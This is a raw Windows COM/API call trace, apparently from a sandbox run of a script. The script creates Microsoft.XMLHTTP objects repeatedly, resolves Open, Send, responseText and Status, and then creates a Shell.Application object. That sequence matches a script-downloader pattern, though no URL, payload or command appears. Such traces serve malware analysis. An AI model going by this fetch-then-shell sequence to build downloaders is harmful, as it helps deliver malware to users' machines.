	[0400.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0400.003] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0400.004] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0400.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7358) returned 0x0
	[0400.004] ??2@YAPEAX_K@Z () returned 0x62f310
	[0400.004] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7358, pUnkSite=0x62f310) 
	[0400.004] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0400.004] XMLHTTPRequest:IUnknown:Release (This=0x49c7358) returned 0x0
	[0400.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0400.004] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0400.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0400.004] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0400.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0400.004] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0400.004] SysStringLen (param_1=0x0) returned 0x0
	[0400.004] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0400.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0400.004] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72c0) returned 0x0
	[0400.004] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0400.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0400.005] ??2@YAPEAX_K@Z () returned 0x62f330
	[0400.005] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0400.005] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0400.005] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0400.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72c0) returned 0x0
	[0400.005] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72c0) returned 0x3
	[0400.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0400.005] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0400.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0400.005] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0400.005] SysStringLen (param_1=0x0) returned 0x0
	[0400.005] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0400.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0400.005] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0400.005] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0400.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7328) returned 0x0
	[0400.005] ??2@YAPEAX_K@Z () returned 0x62f310
	[0400.005] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7328, pUnkSite=0x62f310) 
	[0400.005] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0400.005] XMLHTTPRequest:IUnknown:Release (This=0x49c7328) returned 0x0
	[0400.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0400.006] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0400.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0400.006] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0400.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0400.006] longjmp () 
	[0400.006] longjmp () 
	[0400.006] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0400.006] SysStringLen (param_1=0x0) returned 0x0
	[0400.006] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0400.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0400.006] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0400.006] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0400.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0400.006] ??2@YAPEAX_K@Z () returned 0x62f330
	[0400.006] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0400.006] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0400.006] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0400.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0400.007] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0400.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0400.007] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0400.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0400.007] longjmp () 
	[0400.007] longjmp () 
	[0400.007] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0400.007] SysStringLen (param_1=0x0) returned 0x0
	[0400.007] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0400.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0400.007] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0400.007] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0400.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0400.007] ??2@YAPEAX_K@Z () returned 0x62f310
	[0400.007] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0400.007] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0400.007] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0400.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0400.008] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0400.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0400.008] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0400.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0400.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0400.008] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0400.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0401.265] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0401.265] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0401.265] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0401.265] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0401.265] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0401.265] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0401.265] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0401.265] SysStringLen (param_1=0x0) returned 0x0
	[0401.265] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0401.265] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0401.266] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0401.266] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0401.266] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0401.266] ??2@YAPEAX_K@Z () returned 0x62f350
	[0401.266] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0401.266] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0401.266] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0401.266] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0401.266] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
